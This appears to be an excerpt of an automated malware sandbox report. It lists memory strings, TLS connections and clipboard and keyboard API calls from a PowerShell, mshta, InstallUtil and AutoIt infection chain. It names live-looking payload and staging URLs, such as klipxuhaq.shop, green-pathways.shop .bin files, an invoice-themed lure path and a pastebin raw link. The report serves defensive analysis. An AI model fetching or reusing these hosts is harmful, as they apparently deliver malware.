Source: powershell.exe, 00000004.00000002.1380328709.0000024F89FAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1370748747.00000186BB911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD62A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002C221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 0000000B.00000002.1610462862.000002002C454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.1742082882.00000200443ED000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000000.1778413751.0000000000D49000.00000002.00000001.01000000.00000013.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000002.1910877460.0000000000D49000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1450954284.0000028DD4484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.1380328709.0000024F89F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000004.00000002.1380328709.0000024F89F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1370748747.00000186BB97E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1370748747.00000186BB95A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD62A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002C221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000B.00000002.1610462862.000002002D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DF2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cndef1.green-pathways.shop
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DF2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002C221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002C454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cndef1.green-pathways.shop/api/uz/7552973650/nnn.bin
Source: powershell.exe, 0000000B.00000002.1610462862.000002002D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002C221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002C454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cndef1.green-pathways.shop/api/uz/7552973650/u.bin
Source: powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.1452751540.0000028DD673E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp-invoices-v5.com
Source: powershell.exe, 00000009.00000002.1452751540.0000028DD8139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD64CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp-invoices-v5.com/pdf/cloudviewer/ref095vq842r70/3rd/party/authorisation/form/20241210/doc
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000008.00000003.1396373449.000001D929359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000008.00000003.1396373449.000001D9292F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 0000000B.00000002.1610462862.000002002C454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1452751540.0000028DD7486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002CE54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mshta.exe, 00000006.00000003.1578774556.0000024660876000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591318527.0000024660878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.li
Source: powershell.exe, 00000009.00000002.1552097553.0000028DE6458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD67F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1552097553.0000028DE6315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728955596.000002003C3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: InstallUtil.exe, 00000019.00000002.1846497233.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/gxDS2LkW
Source: InstallUtil.exe, 00000019.00000002.1846497233.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/gxDS2LkWPOeq5
Source: powershell.exe, 00000005.00000002.1370748747.00000186BBDBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1370748747.00000186BBE17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.k
Source: powershell.exe, 00000005.00000002.1370748747.00000186BBDBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.kX
Source: powershell.exe, 00000005.00000002.1373926203.00000186D39E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klip
Source: mshta.exe, 00000006.00000003.1578774556.0000024660888000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591318527.0000024660888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/
Source: mshta.exe, 00000006.00000003.1578774556.0000024660888000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591318527.0000024660888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/1
Source: powershell.exe, 00000004.00000002.1380328709.0000024F8A420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.
Source: mshta.exe, 00000006.00000002.1591232577.000002466081D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4
Source: mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4#
Source: powershell.exe	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4$global:?
Source: mshta.exe, 00000006.00000002.1592677380.0000024E63441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4...p7CcN
Source: mshta.exe, 00000006.00000002.1592677380.0000024E63441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4...x
Source: mshta.exe, 00000006.00000002.1591751221.0000024660A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4.exeDrive
Source: mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4/v
Source: mshta.exe, 00000006.00000003.1405103765.0000024E6345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp42cU3
Source: mshta.exe, 00000006.00000003.1405103765.0000024E6345D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp42cv3
Source: mshta.exe, 00000006.00000002.1594069929.0000024E685B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4:
Source: mshta.exe, 00000006.00000003.1588725610.00000246608A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1589642644.00000246608B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591118375.00000246607E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591517566.00000246608BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1578774556.00000246608A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4C:
Source: mshta.exe, 00000006.00000002.1593693710.0000024E67442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1581134267.0000024E673F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580418347.0000024E673EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584038846.0000024E67442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1581330653.0000024E673F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4Ec
Source: mshta.exe, 00000006.00000002.1591643960.00000246609D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4H
Source: mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4Ku
Source: mshta.exe, 00000006.00000003.1580592459.0000024E674FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1593693710.0000024E674FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4LMEMP
Source: mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4RRC:
Source: mshta.exe, 00000006.00000002.1591548963.00000246608C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1405418364.00000246608CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1578774556.00000246608A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580506676.00000246608C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4T
Source: mshta.exe, 00000006.00000003.1579811940.000002466081C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.000002466081D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.000002466081D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.000002466081D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4X?
Source: mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4;
Source: mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4=
Source: mshta.exe, 00000006.00000003.1586876351.0000024E67A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4P
Source: mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuh
Source: mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4if
Source: mshta.exe, 00000006.00000003.1579013515.0000024E634C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1585030054.0000024E634D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584947566.0000024E634C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584157195.0000024E634C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1592945632.0000024E634D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4lr
Source: powershell.exe, 00000005.00000002.1370748747.00000186BB911000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4p
Source: mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4private
Source: mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4return
Source: mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4s
Source: mshta.exe, 00000006.00000003.1586876351.0000024E67A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4vvqb
Source: powershell.exe, 00000005.00000002.1370530972.00000186B9B20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.klipxuhaq.shop/3VKKE.mp4ystem32
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 83.166.133.91:443 -> 192.168.2.11:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.11:49729 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00384632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

20_2_00384632

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00384830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		20_2_00384830
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CF4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		22_2_00CF4830

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

20_2_00384632

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00370508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

20_2_00370508

